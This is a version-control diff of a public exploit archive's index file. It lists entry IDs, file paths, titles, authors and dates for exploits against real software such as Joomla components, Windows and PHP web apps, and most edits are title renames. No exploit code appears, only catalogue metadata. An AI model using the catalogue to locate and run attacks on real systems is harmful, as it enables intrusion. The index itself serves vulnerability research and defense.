14156,platforms/windows/dos/14156.txt,"Microsoft Windows Vista/Server 2008 - NtUserCheckAccessForIntegrityLevel Use-After-Free",2010-07-01,MSRC,windows,dos,0
14165,platforms/php/webapps/14165.txt,"iScripts EasyBiller - Cross-Site Scripting",2010-07-02,Sangteamtham,php,webapps,0
14163,platforms/php/webapps/14163.txt,"iScripts ReserveLogic 1.0 - SQL Injection",2010-07-01,"Salvatore Fresta",php,webapps,0
@ -12470,12 +12470,12 @@ id,file,description,date,author,platform,type,port
14176,platforms/php/webapps/14176.c,"iScripts Socialware 2.2.x - Arbitrary File Upload",2010-07-02,"Salvatore Fresta",php,webapps,0
14166,platforms/php/webapps/14166.txt,"Bit Weaver 2.7 - Local File Inclusion",2010-07-02,"John Leitch",php,webapps,0
14171,platforms/php/webapps/14171.txt,"Iphone Pointter Social Network - Local File Inclusion",2010-07-02,Sid3^effects,php,webapps,0
14172,platforms/php/webapps/14172.txt,"Joomla! Component Seyret Video (com_seyret) - Blind SQL Injection",2010-07-02,RoAd_KiLlEr,php,webapps,0
14172,platforms/php/webapps/14172.txt,"Joomla! Component 'com_seyret' - Blind SQL Injection",2010-07-02,RoAd_KiLlEr,php,webapps,0
14170,platforms/php/webapps/14170.txt,"Pointter Social Network - Local File Inclusion",2010-07-02,Sid3^effects,php,webapps,0
14168,platforms/asp/webapps/14168.txt,"VGM Forbin - 'article.asp' SQL Injection",2010-07-02,"Th3 RDX",asp,webapps,0
14169,platforms/asp/webapps/14169.txt,"MooreAdvice - 'productlist.asp' SQL Injection",2010-07-02,"Th3 RDX",asp,webapps,0
14175,platforms/windows/dos/14175.pl,"Mp3 Digitalbox 2.7.2.0 - '.mp3' Local Stack Overflow (PoC)",2010-07-02,v3n0m,windows,dos,0
14183,platforms/php/webapps/14183.txt,"Joomla! Component Seyret (com_seyret) - Local File Inclusion",2010-07-03,"Cooler_ unix",php,webapps,0
14183,platforms/php/webapps/14183.txt,"Joomla! Component 'com_seyret' - Local File Inclusion",2010-07-03,"Cooler_ unix",php,webapps,0
14179,platforms/windows/remote/14179.txt,"Microsoft IIS 5.0 - Authentication Bypass (MS10-065)",2010-07-02,"Soroush Dalili",windows,remote,0
14180,platforms/windows/remote/14180.py,"HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe CGI Invalid MaxAge Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80
14181,platforms/windows/remote/14181.py,"HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe CGI Invalid ICount Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80
@ -12485,14 +12485,14 @@ id,file,description,date,author,platform,type,port
14185,platforms/multiple/dos/14185.py,"ISC DHCPD - Denial of Service",2010-07-03,sid,multiple,dos,0
14191,platforms/windows/local/14191.pl,"ASX to MP3 Converter 3.1.2.1 - Local Buffer Overflow (SEH)",2010-07-03,Madjix,windows,local,0
14186,platforms/php/webapps/14186.txt,"Family Connections Who is Chatting AddOn - Remote File Inclusion",2010-07-03,lumut--,php,webapps,0
14187,platforms/php/webapps/14187.txt,"Joomla! Component eventcal 1.6.4 com_eventcal - Blind SQL Injection",2010-07-03,RoAd_KiLlEr,php,webapps,0
14187,platforms/php/webapps/14187.txt,"Joomla! Component 'com_eventcal' 1.6.4 - Blind SQL Injection",2010-07-03,RoAd_KiLlEr,php,webapps,0
14188,platforms/php/webapps/14188.html,"Cpanel 11.25 - Cross-Site Request Forgery (Add FTP Account)",2010-07-03,G0D-F4Th3r,php,webapps,0
14190,platforms/arm/shellcode/14190.c,"Linux/ARM - Polymorphic execve(_/bin/sh__ [_/bin/sh_]_ NULL); - XOR 88 encoded Shellcode (78 bytes)",2010-07-03,"Jonathan Salwan",arm,shellcode,0
14193,platforms/php/webapps/14193.c,"iscripts Socialware 2.2.x - Multiple Vulnerabilities",2010-07-03,"Salvatore Fresta",php,webapps,0
14194,platforms/windows/remote/14194.cpp,"Sun Java Web Server 7.0 u7 - Remote Exploit",2010-07-03,dmc,windows,remote,0
14195,platforms/windows/remote/14195.html,"SasCam WebCam Server 2.6.5 - ActiveX Overwrite (SEH)",2010-07-03,blake,windows,remote,0
14208,platforms/php/webapps/14208.txt,"Sandbox 2.0.2 - Local File Inclusion",2010-07-04,saudi0hacker,php,webapps,0
14196,platforms/php/webapps/14196.txt,"Joomla! Component SocialAds com_socialads - Persistent Cross-Site Scripting",2010-07-03,Sid3^effects,php,webapps,0
14196,platforms/php/webapps/14196.txt,"Joomla! Component 'com_socialads' - Persistent Cross-Site Scripting",2010-07-03,Sid3^effects,php,webapps,0
14197,platforms/php/webapps/14197.txt,"iScripts MultiCart 2.2 - Multiple SQL Injections",2010-07-03,"Salvatore Fresta",php,webapps,0
14198,platforms/php/webapps/14198.txt,"WordPress Plugin Simple:Press 4.3.0 - SQL Injection",2010-07-04,"ADEO Security",php,webapps,0
14199,platforms/php/webapps/14199.txt,"PHPaaCMS 0.3.1 - (show.php?id=) SQL Injection",2010-07-04,Shafiq-Ur-Rehman,php,webapps,0
@ -12503,11 +12503,11 @@ id,file,description,date,author,platform,type,port
14204,platforms/php/webapps/14204.txt,"Esoftpro Online Guestbook Pro - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0
14205,platforms/php/webapps/14205.txt,"Esoftpro Online Photo Pro 2 - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0
14206,platforms/php/webapps/14206.txt,"Esoftpro Online Contact Manager - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0
14207,platforms/php/webapps/14207.txt,"Joomla! Component Phoca Gallery (com_phocagallery) - SQL Injection",2010-07-04,RoAd_KiLlEr,php,webapps,0
14210,platforms/php/webapps/14210.txt,"Joomla! Component Front-edit Address Book (com_addressbook) - Blind SQL Injection",2010-07-04,Sid3^effects,php,webapps,0
14207,platforms/php/webapps/14207.txt,"Joomla! Component 'com_phocagallery' - SQL Injection",2010-07-04,RoAd_KiLlEr,php,webapps,0
14210,platforms/php/webapps/14210.txt,"Joomla! Component 'com_addressbook' - Blind SQL Injection",2010-07-04,Sid3^effects,php,webapps,0
14222,platforms/windows/remote/14222.py,"UFO: Alien Invasion 2.2.1 - Buffer Overflow (Windows 7 ASLR + DEP Bypass)",2010-07-05,Node,windows,remote,0
14211,platforms/php/webapps/14211.txt,"Joomla! Component NijnaMonials (com_ninjamonials) - Blind SQL Injection",2010-07-04,Sid3^effects,php,webapps,0
14213,platforms/php/webapps/14213.txt,"Joomla! Component SEF (com_sef) - Local File Inclusion",2010-07-05,_mlk_,php,webapps,0
14211,platforms/php/webapps/14211.txt,"Joomla! Component 'com_ninjamonials' - Blind SQL Injection",2010-07-04,Sid3^effects,php,webapps,0
14213,platforms/php/webapps/14213.txt,"Joomla! Component 'com_sef' - Local File Inclusion",2010-07-05,_mlk_,php,webapps,0
14214,platforms/php/webapps/14214.txt,"bbPress 1.0.2 - Cross-Site Request Forgery (Change Admin Password)",2010-07-05,saudi0hacker,php,webapps,0
14215,platforms/windows/local/14215.txt,"SasCam 2.7 - ActiveX Head Buffer Overflow",2010-07-05,blake,windows,local,0
14216,platforms/lin_x86/shellcode/14216.c,"Linux/x86 - bind shell port 64533 Shellcode (97 bytes)",2010-07-05,Magnefikko,lin_x86,shellcode,0
@ -12525,7 +12525,7 @@ id,file,description,date,author,platform,type,port
14229,platforms/php/webapps/14229.txt,"Bs Auto_Classifieds Script - 'articlesdetails.php' SQL Injection",2010-07-05,Sid3^effects,php,webapps,0
14230,platforms/php/webapps/14230.txt,"Bs Business_Directory Script - SQL Injection / Authentication Bypass",2010-07-05,Sid3^effects,php,webapps,0
33410,platforms/php/webapps/33410.txt,"Drupal Module Sections 5.x-1.2/6.x-1.2 - HTML Injection",2009-12-16,"Justin C. Klein Keane",php,webapps,0
14232,platforms/php/webapps/14232.txt,"Joomla! Component JPodium (com_jpodium) - SQL Injection",2010-07-05,RoAd_KiLlEr,php,webapps,0
14232,platforms/php/webapps/14232.txt,"Joomla! Component 'com_jpodium' - SQL Injection",2010-07-05,RoAd_KiLlEr,php,webapps,0
14233,platforms/php/webapps/14233.txt,"Bs Auction Script - SQL Injection",2010-07-05,Sid3^effects,php,webapps,0
14234,platforms/linux/shellcode/14234.c,"Linux - 125 bind port to 6778 XOR encoded polymorphic Shellcode (125 bytes)",2010-07-05,gunslinger_,linux,shellcode,0
14236,platforms/windows/dos/14236.txt,"Sun Java Web Server 7.0 u7 - Admin Interface Denial of Service",2010-07-06,muts,windows,dos,8800
@ -12540,7 +12540,7 @@ id,file,description,date,author,platform,type,port
14244,platforms/php/webapps/14244.txt,"Lyrics 3.0 - Engine SQL Injection",2010-07-06,Sid3^effects,php,webapps,0
14245,platforms/php/webapps/14245.txt,"Pre Multiple Vendors Shopping Malls - SQL Injection / Authentication Bypass",2010-07-06,**RoAd_KiLlEr**,php,webapps,0
14248,platforms/windows/remote/14248.py,"minerCPP 0.4b - Remote Buffer Overflow / Format String Attack Exploit",2010-07-06,l3D,windows,remote,0
14249,platforms/php/webapps/14249.txt,"Joomla! Component com_autartimonial - SQL Injection",2010-07-06,Sid3^effects,php,webapps,0
14249,platforms/php/webapps/14249.txt,"Joomla! Component 'com_autartimonial' - SQL Injection",2010-07-06,Sid3^effects,php,webapps,0
14251,platforms/php/webapps/14251.txt,"PsNews 1.3 - SQL Injection",2010-07-06,S.W.T,php,webapps,0
14254,platforms/osx/remote/14254.py,"Apple Mac OSX EvoCam Web Server (Snow Leopard) - ROP Remote Exploit",2010-07-06,d1dn0t,osx,remote,0
14285,platforms/windows/webapps/14285.txt,"Outlook Web Access 2007 - Cross-Site Request Forgery",2010-07-08,"Rosario Valotta",windows,webapps,0
@ -13781,7 +13781,7 @@ id,file,description,date,author,platform,type,port
15855,platforms/windows/local/15855.py,"Digital Music Pad 8.2.3.4.8 - '.pls' SEH Overflow",2010-12-29,"Abhishek Lyall",windows,local,0
15857,platforms/php/webapps/15857.txt,"Discovery TorrentTrader 2.6 - Multiple Vulnerabilities",2010-12-29,EsS4ndre,php,webapps,0
15858,platforms/php/webapps/15858.txt,"WordPress 3.0.3 - Persistent Cross-Site Scripting (Internet Explorer 6/7 NS8.1)",2010-12-29,Saif,php,webapps,0
15860,platforms/windows/dos/15860.py,"TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service",2010-12-29,emgent,windows,dos,0
15860,platforms/windows/dos/15860.py,"TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service (2)",2010-12-29,emgent,windows,dos,0
15861,platforms/windows/remote/15861.txt,"httpdasm 0.92 - Directory Traversal",2010-12-29,"John Leitch",windows,remote,0
15862,platforms/windows/remote/15862.txt,"quickphp Web server 1.9.1 - Directory Traversal",2010-12-29,"John Leitch",windows,remote,0
15863,platforms/php/webapps/15863.txt,"lightneasy 3.2.2 - Multiple Vulnerabilities",2010-12-29,"High-Tech Bridge SA",php,webapps,0
@ -14715,7 +14715,7 @@ id,file,description,date,author,platform,type,port
16903,platforms/php/remote/16903.rb,"OpenX - banner-edit.php Arbitrary File Upload / PHP Code Execution (Metasploit)",2010-09-20,Metasploit,php,remote,0
16904,platforms/php/webapps/16904.rb,"Trixbox CE 2.6.1 - langChoice PHP Local File Inclusion (Metasploit)",2011-01-08,Metasploit,php,webapps,0
16905,platforms/cgi/webapps/16905.rb,"AWStats 6.1 < 6.2 - configdir Remote Command Execution (Metasploit)",2009-12-26,Metasploit,cgi,webapps,0
16906,platforms/php/webapps/16906.rb,"Joomla! Plugin tinybrowser 1.5.12 - Arbitrary File Upload / Code Execution (Metasploit)",2010-06-15,Metasploit,php,webapps,0
16906,platforms/php/webapps/16906.rb,"Joomla! Plugin 'tinybrowser' 1.5.12 - Arbitrary File Upload / Code Execution (Metasploit)",2010-06-15,Metasploit,php,webapps,0
16907,platforms/hardware/webapps/16907.rb,"Google Appliance ProxyStyleSheet - Command Execution (Metasploit)",2010-07-01,Metasploit,hardware,webapps,0
16908,platforms/cgi/webapps/16908.rb,"Nagios3 - statuswml.cgi Ping Command Execution (Metasploit)",2010-07-14,Metasploit,cgi,webapps,0
16909,platforms/php/webapps/16909.rb,"Coppermine Photo Gallery 1.4.14 - picEditor.php Command Execution (Metasploit)",2010-07-03,Metasploit,php,webapps,0
@ -19595,7 +19595,7 @@ id,file,description,date,author,platform,type,port
22304,platforms/multiple/remote/22304.rb,"ManageEngine Security Manager Plus 5.5 build 5505 - SQL Injection (Metasploit)",2012-10-28,Metasploit,multiple,remote,0
22305,platforms/windows/remote/22305.rb,"HP Operations Agent Opcode - coda.exe 0x8c Buffer Overflow (Metasploit)",2012-10-29,Metasploit,windows,remote,0
22306,platforms/windows/remote/22306.rb,"HP Operations Agent - Opcode coda.exe 0x34 Buffer Overflow (Metasploit)",2012-10-29,Metasploit,windows,remote,0
22330,platforms/windows/dos/22330.txt,"Microsoft Excel 2010 - Crash PoC (1)",2012-10-29,coolkaveh,windows,dos,0
22330,platforms/windows/dos/22330.txt,"Microsoft Excel 2010 - Crash (PoC) (1)",2012-10-29,coolkaveh,windows,dos,0
22332,platforms/unix/local/22332.c,"BSD lpr 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (2)",1998-04-22,CMN,unix,local,0
22333,platforms/windows/dos/22333.pl,"Qualcomm Eudora 5.0/5.1/6.0 - Long Attachment Filename Denial of Service (1)",2003-03-05,"Paul Szabo",windows,dos,0
22334,platforms/windows/dos/22334.pl,"Qualcomm Eudora 5.0/5.1/6.0 - Long Attachment Filename Denial of Service (2)",2003-03-05,"Paul Szabo",windows,dos,0
@ -21861,7 +21861,6 @@ id,file,description,date,author,platform,type,port
24655,platforms/php/webapps/24655.txt,"PHPLinks 2.1.x - Multiple Input Validation Vulnerabilities",2004-10-05,"LSS Security",php,webapps,0
24656,platforms/php/remote/24656.txt,"PHP 4.x/5.0.1 - PHP_Variables Remote Memory Disclosure",2004-09-15,"Stefano Di Paola",php,remote,0
24657,platforms/php/webapps/24657.txt,"BlackBoard Internet NewsBoard System 1.5.1 - Remote File Inclusion",2004-10-06,"Lin Xiaofeng",php,webapps,0
24658,platforms/php/webapps/24658.txt,"Brooky CubeCart 2.0.1 - SQL Injection",2004-10-06,"Pedro Sanches",php,webapps,0
24659,platforms/php/webapps/24659.txt,"DCP-Portal 3.7/4.x/5.x - calendar.php Multiple Parameter Cross-Site Scripting",2004-10-06,"Alexander Antipov",php,webapps,0
24660,platforms/php/webapps/24660.txt,"DCP-Portal 3.7/4.x/5.x - 'index.php' Multiple Parameter Cross-Site Scripting",2004-10-06,"Alexander Antipov",php,webapps,0
24661,platforms/php/webapps/24661.txt,"DCP-Portal 3.7/4.x/5.x - announcement.php cid Parameter Cross-Site Scripting",2004-10-06,"Alexander Antipov",php,webapps,0
@ -22297,7 +22296,7 @@ id,file,description,date,author,platform,type,port
25094,platforms/windows/remote/25094.c,"Microsoft MSN Messenger 6.2.0137 - '.png' Buffer Overflow",2005-02-08,ATmaCA,windows,remote,0
25095,platforms/windows/remote/25095.txt,"Microsoft Internet Explorer 5.0.1 - Mouse Event URI Status Bar Obfuscation",2005-02-14,Paul,windows,remote,0
25096,platforms/cgi/webapps/25096.txt,"AWStats 5.x/6.x - Debug Remote Information Disclosure",2005-02-14,GHC,cgi,webapps,0
25097,platforms/php/webapps/25097.txt,"Brooky CubeCart 2.0.1/2.0.4 - ndex.php language Parameter Cross-Site Scripting",2005-02-14,"John Cobb",php,webapps,0
25097,platforms/php/webapps/25097.txt,"Brooky CubeCart 2.0.1/2.0.4 - 'index.php' language Parameter Cross-Site Scripting",2005-02-14,"John Cobb",php,webapps,0
25098,platforms/php/webapps/25098.txt,"Brooky CubeCart 2.0.1/2.0.4 - 'index.php' language Parameter Traversal Arbitrary File Access",2005-02-14,"John Cobb",php,webapps,0
25099,platforms/php/webapps/25099.txt,"CitrusDB 0.3.6 - importcc.php Arbitrary Database Injection",2005-02-15,"RedTeam Pentesting",php,webapps,0
25100,platforms/php/webapps/25100.txt,"CitrusDB 0.3.6 - uploadcc.php Arbitrary Database Injection",2005-02-15,"RedTeam Pentesting",php,webapps,0
@ -30597,7 +30596,6 @@ id,file,description,date,author,platform,type,port
33856,platforms/php/webapps/33856.txt,"Viennabux Beta! - 'cat' Parameter SQL Injection",2010-04-09,"Easy Laster",php,webapps,0
33858,platforms/php/webapps/33858.txt,"DBSite wb CMS - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2010-04-21,The_Exploited,php,webapps,0
34143,platforms/windows/remote/34143.txt,"XnView 1.97.4 - '.MBM' File Remote Heap Buffer Overflow",2010-06-14,"Mauro Olea",windows,remote,0
34144,platforms/php/webapps/34144.txt,"Joomla! Component com_easygb - 'Itemid' Parameter Cross-Site Scripting",2010-06-08,"L0rd CrusAd3r",php,webapps,0
34145,platforms/unix/dos/34145.txt,"Python 3.2 - 'audioop' Module Memory Corruption",2010-06-14,haypo,unix,dos,0
34146,platforms/php/webapps/34146.txt,"Sell@Site PHP Online Jobs Login - Multiple SQL Injections",2010-06-15,"L0rd CrusAd3r",php,webapps,0
34147,platforms/php/webapps/34147.txt,"JForum 2.1.8 - 'Username' Parameter Cross-Site Scripting",2010-06-06,"Adam Baldwin",php,webapps,0
@ -30727,8 +30725,8 @@ id,file,description,date,author,platform,type,port
34002,platforms/windows/remote/34002.c,"TeamViewer 5.0.8232 - Remote Buffer Overflow",2010-05-18,"fl0 fl0w",windows,remote,0
34003,platforms/php/webapps/34003.txt,"Joomla! Component Percha Image Attach 1.1 - 'index.php' Controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
34004,platforms/php/webapps/34004.txt,"Joomla! Component Percha Fields Attach 1.0 - 'index.php' Controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
34005,platforms/php/webapps/34005.txt,"Joomla! Component Percha Downloads Attach 1.1 - 'index.php' Controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
34006,platforms/php/webapps/34006.txt,"Joomla! Component Percha Gallery 1.6 Beta - 'index.php' Controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
34005,platforms/php/webapps/34005.txt,"Joomla! Component 'com_perchadownloadsattach' 1.1 - 'Controller' Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
34006,platforms/php/webapps/34006.txt,"Joomla! Component 'com_perchagallery' 1.6 Beta - 'Controller' Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
34007,platforms/php/webapps/34007.txt,"Dolibarr CMS 3.5.3 - Multiple Security Vulnerabilities",2014-07-08,"Deepak Rathore",php,webapps,0
34008,platforms/php/webapps/34008.txt,"Joomla! Component Percha Multicategory Article 0.6 - 'index.php' Controller Parameter Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
34009,platforms/windows/remote/34009.rb,"Yokogawa CS3000 - BKFSim_vhfd.exe Buffer Overflow (Metasploit)",2014-07-08,Metasploit,windows,remote,20010
@ -30776,7 +30774,6 @@ id,file,description,date,author,platform,type,port
34053,platforms/php/webapps/34053.txt,"ImpressPages CMS 1.0x - 'admin.php' Multiple SQL Injection",2010-05-28,"High-Tech Bridge SA",php,webapps,0
34054,platforms/php/webapps/34054.txt,"GR Board 1.8.6 - 'page.php' Remote File Inclusion",2010-05-30,eidelweiss,php,webapps,0
34055,platforms/php/webapps/34055.txt,"CMScout 2.08 - Cross-Site Scripting",2010-05-28,XroGuE,php,webapps,0
34056,platforms/php/webapps/34056.txt,"Joomla! 1.5.x - Multiple Modules 'search' Parameter Cross-Site Scripting Vulnerabilities",2010-05-28,"Riyaz Ahemed Walikar",php,webapps,0
34057,platforms/php/webapps/34057.txt,"wsCMS - 'news.php' Cross-Site Scripting",2010-05-31,cyberlog,php,webapps,0
34058,platforms/multiple/dos/34058.txt,"DM Database Server - 'SP_DEL_BAK_EXPIRED' Memory Corruption",2010-05-31,"Shennan Wang HuaweiSymantec SRT",multiple,dos,0
34059,platforms/windows/remote/34059.py,"Kolibri Web Server 2.0 - GET Request SEH Exploit",2014-07-14,"Revin Hadi Saputra",windows,remote,0
@ -30789,11 +30786,10 @@ id,file,description,date,author,platform,type,port
34068,platforms/php/webapps/34068.html,"CMS Made Simple 1.x - Cross-Site Scripting / Cross-Site Request Forgery",2010-01-01,"Truong Thao Nguyen",php,webapps,0
34069,platforms/windows/dos/34069.html,"Microsoft Internet Explorer 8 - CSS 'expression' Remote Denial of Service",2010-01-01,MustLive,windows,dos,0
34070,platforms/php/webapps/34070.txt,"Datetopia Match Agency BiZ - Multiple Cross-Site Scripting Vulnerabilities",2010-01-07,R3d-D3V!L,php,webapps,0
34071,platforms/php/webapps/34071.txt,"Joomla! Component com_sar_news - 'id' Parameter SQL Injection",2010-06-02,LynX,php,webapps,0
34071,platforms/php/webapps/34071.txt,"Joomla! Component 'com_sar_news' - 'id' Parameter SQL Injection",2010-06-02,LynX,php,webapps,0
34072,platforms/php/webapps/34072.txt,"Hexjector 1.0.7.2 - 'hexjector.php' Cross-Site Scripting",2010-06-01,hexon,php,webapps,0
34073,platforms/php/webapps/34073.py,"TCExam 10.1.7 - 'admin/code/tce_functions_tcecode_editor.php' Arbitrary File Upload",2010-06-02,"John Leitch",php,webapps,0
34136,platforms/multiple/remote/34136.txt,"Plesk Server Administrator (PSA) - 'locale' Parameter Local File Inclusion",2010-06-21,"Pouya Daneshmand",multiple,remote,0
34114,platforms/php/webapps/34114.txt,"Joomla! Component Jreservation - Cross-Site Scripting",2010-06-09,Sid3^effects,php,webapps,0
34086,platforms/linux/webapps/34086.txt,"BitDefender GravityZone 5.1.5.386 - Multiple Vulnerabilities",2014-07-16,"SEC Consult",linux,webapps,443
34087,platforms/php/webapps/34087.txt,"Joomla! Component 'com_youtubegallery' - SQL Injection",2014-07-16,"Pham Van Khanh",php,webapps,80
34153,platforms/php/webapps/34153.txt,"2DayBiz ybiz Network Community Script - SQL Injection / Cross-Site Scripting",2010-06-16,Sid3^effects,php,webapps,0
@ -30807,7 +30803,6 @@ id,file,description,date,author,platform,type,port
34083,platforms/php/webapps/34083.txt,"Western Digital My Book World Edition 1.1.16 - 'lang' Parameter Cross-Site Scripting",2009-12-30,emgent,php,webapps,0
34084,platforms/php/webapps/34084.txt,"L2Web LineWeb 1.0.5 - Multiple Input Validation Vulnerabilities",2010-01-06,"Ignacio Garrido",php,webapps,0
34085,platforms/php/webapps/34085.txt,"WordPress Plugin Gigya Socialize 1.0/1.1.x - Cross-Site Scripting",2010-06-04,MustLive,php,webapps,0
34137,platforms/php/webapps/34137.txt,"Joomla! Component com_videowhisper_2wvc - Cross-Site Scripting",2010-06-10,Sid3^effects,php,webapps,0
34088,platforms/android/remote/34088.html,"Boat Browser 8.0 / 8.0.1 - Remote Code Execution",2014-07-16,c0otlass,android,remote,0
34089,platforms/php/webapps/34089.txt,"Bilboplanet 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2014-07-16,"Vivek N",php,webapps,80
34090,platforms/multiple/dos/34090.py,"Node Browserify 4.2.0 - Remote Code Execution",2014-07-16,"Cal Leeming",multiple,dos,0
@ -30858,7 +30853,7 @@ id,file,description,date,author,platform,type,port
34135,platforms/windows/dos/34135.py,"DjVuLibre 3.5.25.3 - Out of Bounds Access Violation",2014-07-22,drone,windows,dos,0
34149,platforms/hardware/webapps/34149.txt,"Netgear DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure",2014-07-23,"Dolev Farhi",hardware,webapps,0
34158,platforms/windows/dos/34158.txt,"Chrome Engine 4 - Denial Of Service",2010-06-17,"Luigi Auriemma",windows,dos,0
34159,platforms/php/webapps/34159.txt,"Joomla! Component Gallery XML 1.1 - SQL Injection / Local File Inclusion",2010-06-18,jdc,php,webapps,0
34159,platforms/php/webapps/34159.txt,"Joomla! Component 'com_galleryxml' 1.1 - SQL Injection / Local File Inclusion",2010-06-18,jdc,php,webapps,0
34151,platforms/windows/dos/34151.txt,"Adobe SVG Viewer 3.0 - Circle Transform Remote Code Execution",2010-06-16,h07,windows,dos,0
34152,platforms/linux/remote/34152.txt,"CUPS 1.4.2 - Web Interface Information Disclosure",2010-06-15,"Luca Carettoni",linux,remote,0
34160,platforms/php/remote/34160.txt,"Omeka 2.2.1 - Remote Code Execution",2014-07-24,LiquidWorm,php,remote,80
@ -30946,7 +30941,7 @@ id,file,description,date,author,platform,type,port
34246,platforms/php/webapps/34246.txt,"AL-Caricatier 2.5 - 'comment.php' Cross-Site Scripting",2009-12-25,indoushka,php,webapps,0
34248,platforms/multiple/dos/34248.txt,"EDItran Communications Platform (editcp) 4.1 - Remote Buffer Overflow",2010-07-05,"Pedro Andujar",multiple,dos,0
34249,platforms/linux/dos/34249.txt,"Freeciv 2.2.1 - Multiple Remote Denial Of Service Vulnerabilities",2010-07-03,"Luigi Auriemma",linux,dos,0
34250,platforms/php/webapps/34250.txt,"Joomla! Component Miniwork Studio Canteen 1.0 - SQL Injection / Local File Inclusion",2010-07-05,Drosophila,php,webapps,0
34250,platforms/php/webapps/34250.txt,"Joomla! Component 'com_canteen' 1.0 - Local File Inclusion",2010-07-05,Drosophila,php,webapps,0
34251,platforms/windows/dos/34251.txt,"Multiple Tripwire Interactive Games - 'STEAMCLIENTBLOB' Multiple Denial Of Service Vulnerabilities",2010-07-05,"Luigi Auriemma",windows,dos,0
34252,platforms/php/webapps/34252.txt,"i-Net Solution Matrimonial Script 2.0.3 - 'alert.php' Cross-Site Scripting",2010-07-06,"Andrea Bocchetti",php,webapps,0
34253,platforms/php/webapps/34253.txt,"Orbis CMS 1.0.2 - 'editor-body.php' Cross-Site Scripting",2010-07-05,"John Leitch",php,webapps,0
@ -31131,7 +31126,7 @@ id,file,description,date,author,platform,type,port
34452,platforms/php/webapps/34452.py,"XRms - Blind SQL Injection / Command Execution",2014-08-28,"Benjamin Harris",php,webapps,80
34453,platforms/php/webapps/34453.txt,"PaoBacheca 2.1 - 'index.php' URI Cross-Site Scripting",2009-09-16,Moudi,php,webapps,0
34454,platforms/php/webapps/34454.txt,"PaoBacheca 2.1 - scrivi.php URI Cross-Site Scripting",2009-09-16,Moudi,php,webapps,0
34455,platforms/php/webapps/34455.txt,"Rock Band CMS 0.10 - 'news.php' Multiple SQL Injection",2010-08-12,Affix,php,webapps,0
34455,platforms/php/webapps/34455.txt,"Rock Band CMS 0.10 - 'news.php' Multiple SQL Injection (2)",2010-08-12,Affix,php,webapps,0
34457,platforms/multiple/dos/34457.txt,"Sniper Elite 1.0 - Null Pointer Dereference Denial Of Service",2009-08-14,"Luigi Auriemma",multiple,dos,0
34458,platforms/windows/dos/34458.html,"Microsoft Internet Explorer - Memory Corruption PoC (MS14-029)",2014-08-28,PhysicalDrive0,windows,dos,0
34459,platforms/php/webapps/34459.txt,"Amiro.CMS 5.4 - Multiple Input Validation Vulnerabilities",2009-10-19,"Vladimir Vorontsov",php,webapps,0
@ -33979,6 +33974,7 @@ id,file,description,date,author,platform,type,port
37536,platforms/multiple/remote/37536.rb,"Adobe Flash Player - Nellymoser Audio Decoding Buffer Overflow (Metasploit)",2015-07-08,Metasploit,multiple,remote,0
37537,platforms/php/webapps/37537.txt,"phpProfiles - Multiple Security Vulnerabilities",2012-07-24,L0n3ly-H34rT,php,webapps,0
37538,platforms/linux/dos/37538.py,"ISC DHCP 4.x - Multiple Denial of Service Vulnerabilities",2012-07-25,"Markus Hietava",linux,dos,0
40709,platforms/aix/local/40709.sh,"IBM AIX 6.1/7.1/7.2.0.2 - 'lsmcode' Privilege Escalation",2016-11-04,"Hector X. Monsegur",aix,local,0
37540,platforms/php/webapps/37540.txt,"Joomla! Component 'com_odudeprofile' - 'profession' Parameter SQL Injection",2012-07-25,"Daniel Barragan",php,webapps,0
37541,platforms/php/webapps/37541.txt,"tekno.Portal 0.1b - 'anket.php' SQL Injection",2012-07-25,Socket_0x03,php,webapps,0
37542,platforms/windows/remote/37542.html,"Barcodewiz 'Barcodewiz.dll' ActiveX Control - 'Barcode' Method Remote Buffer Overflow",2012-07-25,coolkaveh,windows,remote,0
@ -36568,7 +36564,7 @@ id,file,description,date,author,platform,type,port
40330,platforms/windows/local/40330.py,"FortiClient SSLVPN 5.4 - Credentials Disclosure",2016-09-01,"Viktor Minin",windows,local,0
40436,platforms/android/remote/40436.rb,"Android 5.0 <= 5.1.1 - 'Stagefright' .MP4 tx3g Integer Overflow (Metasploit)",2016-09-27,Metasploit,android,remote,0
40438,platforms/windows/local/40438.txt,"Glassfish Server - Unquoted Service Path Privilege Escalation",2016-09-28,s0nk3y,windows,local,0
40439,platforms/windows/dos/40439.py,"VLC Media Player 2.2.1 - Buffer Overflow",2016-09-28,"sultan albalawi",windows,dos,0
40439,platforms/windows/dos/40439.py,"VideoLAN VLC Media Player 2.2.1 - Buffer Overflow",2016-09-28,"sultan albalawi",windows,dos,0
40442,platforms/windows/local/40442.txt,"Netgear Genie 2.4.32 - Unquoted Service Path Elevation of Privilege",2016-09-30,Tulpa,windows,local,0
40443,platforms/windows/local/40443.txt,"Windows Firewall Control - Unquoted Service Path Privilege Escalation",2016-10-03,zaeek,windows,local,0
40449,platforms/android/dos/40449.txt,"Android - Insufficient Binder Message Verification Pointer Leak",2016-10-03,"Google Security Research",android,dos,0
@ -36588,7 +36584,7 @@ id,file,description,date,author,platform,type,port
40467,platforms/php/webapps/40467.txt,"PHP Classifieds Rental Script - Blind SQL Injection",2016-10-06,OoN_Boy,php,webapps,0
40468,platforms/php/webapps/40468.txt,"B2B Portal Script - Blind SQL Injection",2016-10-06,OoN_Boy,php,webapps,0
